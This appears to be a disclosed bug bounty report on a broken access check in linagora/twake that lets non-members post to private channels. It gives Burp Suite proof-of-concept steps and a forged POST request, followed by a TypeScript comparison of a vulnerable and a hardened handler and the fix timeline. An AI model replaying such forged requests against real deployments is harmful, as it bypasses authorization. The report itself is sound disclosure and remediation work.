Send any message to any private channel in linagora/twake

Valid

Reported on

Jan 1st 2023


Description

A user who is not a member of a private channel can add any message to that channel. The cause is that the web application does not check whether the sender's user id is a member of the private channel before accepting the message.

Proof of Concept

Log in to the website in browser 1 as user A.

Log in to the website in browser 2 as user B.

In browser 1, user A creates a private channel. In browser 2, user B captures the send-message request with Burp Suite.

Take user A's private channel id and substitute it into user B's send-message request in Burp Suite.

POST /internal/services/messages/v1/companies/9060b950-89b4-11ed-902d-338d3eb6e868/threads HTTP/1.1

{"resource":{"participants":[{"type":"channel","id":"ddd58469-9c1a-4548-ba28-5ad057522f7f","company_id":"9060b950-89b4-11ed-902d-338d3eb6e868","workspace_id":"9072bab0-89b4-11ed-902d-338d3eb6e868"}]},"options":{"message":{"thread_id":"59c0d1b0-89b8-11ed-81da-e96b2398db85","created_at":1672566039115,"user_id":"eee929d0-89b4-11ed-902d-338d3eb6e868","context":{"_front_id":"59c0d1b1-89b8-11ed-81da-e96b2398db85"},"text":"This is message private","files":[]}}}

Demo: https://drive.google.com/file/d/1eDipnxCFUm6JUtJJHBo8AYM1ofNSnblN/view
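The missing check described above, as an added illustration that is not Twake's own code: a simplified handler for the thread-creation body shown in the proof of concept, written once in the vulnerable form (no membership lookup) and once hardened. The channel ids, user ids, in-memory channel store and function names are assumptions made for this example; the hardened variant also takes the sender identity from the authenticated session rather than from the user_id field in the request body, which the client controls.

```typescript
// Added example, not Twake's code. All ids, the channel store and the
// function names are constructed for illustration.

type Visibility = "public" | "private";

interface Channel {
  id: string;
  company_id: string;
  workspace_id: string;
  visibility: Visibility;
  members: Set<string>; // user ids allowed to read and post
}

interface Participant {
  type: string;
  id: string;
  company_id: string;
  workspace_id: string;
}

// Shape of the POST .../threads body from the report (only the fields the check needs).
interface CreateThreadBody {
  resource: { participants: Participant[] };
  options: { message: { text: string; user_id?: string } };
}

interface Result {
  status: number;
  reason?: string;
}

// Constructed sample store: one private channel whose only member is user A,
// and one public channel both users belong to.
const channels = new Map<string, Channel>([
  ["chan-private-A", {
    id: "chan-private-A", company_id: "company-1", workspace_id: "ws-1",
    visibility: "private", members: new Set(["user-A"]),
  }],
  ["chan-public", {
    id: "chan-public", company_id: "company-1", workspace_id: "ws-1",
    visibility: "public", members: new Set(["user-A", "user-B"]),
  }],
]);

// Vulnerable variant: accepts any existing channel id without consulting membership.
function createThreadUnchecked(_sessionUserId: string, body: CreateThreadBody): Result {
  for (const p of body.resource.participants) {
    if (p.type === "channel" && !channels.has(p.id)) {
      return { status: 404, reason: "unknown channel" };
    }
  }
  return { status: 201 };
}

// Hardened variant: the authenticated session user (not body.options.message.user_id)
// must be a member of every private channel the thread is posted into, and the
// channel must belong to the company/workspace named in the request.
function createThreadChecked(sessionUserId: string, body: CreateThreadBody): Result {
  for (const p of body.resource.participants) {
    if (p.type !== "channel") continue;
    const channel = channels.get(p.id);
    if (!channel) return { status: 404, reason: "unknown channel" };
    if (channel.company_id !== p.company_id || channel.workspace_id !== p.workspace_id) {
      return { status: 403, reason: "channel does not belong to this workspace" };
    }
    if (channel.visibility === "private" && !channel.members.has(sessionUserId)) {
      return { status: 403, reason: "not a member of private channel" };
    }
  }
  return { status: 201 };
}

// Constructed request modelled on the proof-of-concept body: user B's session,
// but the participant points at user A's private channel.
const sampleBody: CreateThreadBody = {
  resource: {
    participants: [{ type: "channel", id: "chan-private-A", company_id: "company-1", workspace_id: "ws-1" }],
  },
  options: { message: { text: "This is message private", user_id: "user-B" } },
};

console.log("unchecked:", createThreadUnchecked("user-B", sampleBody)); // 201: message lands in A's channel
console.log("checked:  ", createThreadChecked("user-B", sampleBody));   // 403: B is not a member
```

The membership test belongs on the server side of the thread-creation route; a client-side check or a check against the body's own user_id field would not have stopped the request captured above.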

Impact

A user can send any message to any private channel.

We are processing your report and will contact the linagora/twake team within 24 hours. 8 days ago
We have contacted a member of the linagora/twake team and are waiting to hear back 7 days ago
Romaric Mourgues modified the Severity from Medium (6.3) to High (8.3) 5 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Romaric Mourgues validated this vulnerability 5 days ago

Thanks, we are working on a fix today

Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Romaric Mourgues marked this as fixed in 2022.Q3.1120-patch with commit 721d9b 5 days ago
Romaric Mourgues has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jan 7th 2023
Kevin Kien (Researcher), 5 days ago:


I can receive a CVE for this bug

Romaric Mourgues published this vulnerability 3 days ago